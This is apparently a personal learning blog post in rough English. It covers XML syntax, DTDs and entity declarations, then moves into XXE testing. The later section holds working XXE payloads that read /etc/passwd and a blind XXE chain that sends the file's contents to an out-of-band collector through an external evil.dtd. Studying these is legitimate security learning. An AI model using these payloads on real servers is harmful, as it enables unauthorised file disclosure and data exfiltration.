January 1st 2019, 12:00:00 pm
Learn:http://www.w3school.com.cn/xml/xml_intro.asp
Simple note:
XML
A simple example of XML:
1 2 3 4 5 6 7 8 9 10 11 12 13
| <?xml version="1.0" encoding="ISO-8859-1 ?> <skate> <people grade="four"> <name>azhu</name> <high> three board </high> </people> <people grade="one"> <name>threezhi</name> <high> three board </high> </people> </skate>
`<!-- You should avoid use attribute of XML. -->`
|
In XML, there are five predefined entity reference(实体引用):
1 2 3 4 5
| < < > > & & ' ' " "
|
A example of load an XML document to XML parser(解释器) :
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
| <script> if (window.XMLHttpRequest) {// code for IE7+, Firefox, Chrome, Opera, Safari xmlhttp=new XMLHttpRequest(); }else{ // code for IE6, IE5 xmlhttp=new ActiveXObject("Microsoft.XMLHTTP"); }
xmlhttp.open("GET","note.xml",false); xmlhttp.send(); xmlDoc=xmlhttp.responseXML;
document.getElementById("to").innerHTML=xmlDoc.getElementsByTagName("to")[0].childNodes[0].nodeValue; document.getElementById("from").innerHTML=xmlDoc.getElementsByTagName("from")[0].childNodes[0].nodeValue; document.getElementById("message").innerHTML=xmlDoc.getElementsByTagName("body")[0].childNodes[0].nodeValue;
</script>
|
DTD
A example about DTD in XML:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
| <?xml version="1.0" encoding="ISO-8859-1 ?>
<!DOCTYPE skate[ <!ELEMENT people (name, high)> <!ELEMENT name (#PCDATA)> <!ELEMENT high (#PCDATA)> ]>
<skate> <people grade="four"> <name>azhu</name> <high> three board </high> </people> <people grade="one"> <name>threezhi</name> <high> three board </high> </people> </skate>
|
External document declaration:
<!DOCTYPE skate SYSTEM "file_path">
PCDATA means parsed character data. The tags in the text will be handled as a flag and the entity will be expand.
CDATA means character data and it will not be expand.
In DTD , declare an element and a attribute.:
1 2 3 4 5 6 7 8 9 10 11 12
| <!ELEMENT Element_name category> <!ELEMENT Element_name (content)> <!ELEMENT Element_name (Elemnt1, Element2...)>
Empty Element: <!ELEMENT Element_name, EMPTY>
An element who just have PCDATA should use #PCDATA to declare.
<!ATTLIST name type category defaults> <!ATTLIST payment type CDATA "check">
|
DTD - Entity(实体):
A entity declare:
Internal entity:
1 2 3 4 5 6 7 8 9
| DTD: <!ENTITY name "value"> <!ENTITY writer "Bill Gates"> <!ENTITY copyright "Copyright W3School.com.cn">
XML: <author>&writer;©right;</author>
|
External entity:
1 2 3 4 5 6
| DTD: <!ENTITY writer SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd"> <!ENTITY copyright SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd">
XML: <author>&writer;©right;</author>
|
Parameter entity:
1 2
| <!ENTITY %entity_name "value"> <!ENTITY %entity_name SYSTEM "URL">
|
Try
This is a internal entity:
1 2 3 4 5 6 7 8 9
| <?xml version="1.0" encoding="ISO-8859-1" ?>
<!DOCTYPE note[ <!ELEMENT note (name)> <!ENTITY fuck "You"> ]> <note> <name>&fuck;</name> </note>
|
I don’t know why that I can’t build a xml within external entity successfully. So I wanan put it away in this time.
DIG
When there is a post , it made up by xml. And the parameter can be control. Mybe there hava a XXE vluntery.
We can use some simple xml to test it.
1 2 3 4 5 6
| <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE test[ <!ENTITY foo "Testing"> ]>
<parameter>&foo;</parameter>
|
If it return “Testing”. We can use another to get more information.
Normal XXE
1 2 3 4 5
| <?xml version="1.0"?> <!DOCTYPE a [ <!ENTITY test SYSTEM "file:///etc/passwd"> ]> <c>&test;</c>
|
Parameter entity:
1 2 3 4 5
| <?xml version="1.0"?> <!DOCTYPE a [ <!ENTITY % test SYSTEM "file:///etc/passwd"> %test; ]>
|
If the website return nothing , There is another mean to deal with this problem.
Use external entity:
XML:
1 2 3 4 5
| <?xml version="1.0"?> <!DOCTYPE a [ <!ENTITY test SYSTEM "http://127.0.0.1/shell.dtd"> ]> <c>&test;</c>
|
DTD:
1
| <!ENTITY foo SYSTEM "file:///etc/passwd">
|
Blind XXE with ceye.io:
1 2 3 4 5
| <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://ip.port.b182oj.ceye.io/xxe_test"> %remote;]> <root/>
|
We can create a dtd to get echo result(回显结果).
XML:
1 2 3 4 5 6 7
| <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE a [ <!ENTITY % payload SYSTEM "file:///etc/passwd"> <!ENTITY % dtd SYSTEM "http://*.*.*.*:8080/xml/evil.dtd"> %dtd; %send; ]>
|
DTD:
1 2 3 4
| <?xml version="1.0" encoding="UTF-8"?> <!ENTITY % all "<!ENTITY % send SYSTEM 'http://ip.port.b182oj.ceye.io/?xml1=%payload;'>" >%all;
|
If the XEE is exist, ceye will get a GET request.
Of course there are many means to get important and private information. But due to my ability, I wanna put it down to learn more important things.
XML in PHP:
1 2 3 4
| <?php $xml=simplexml_load_file("note.xml"); print_r($xml); ?>
|
Reference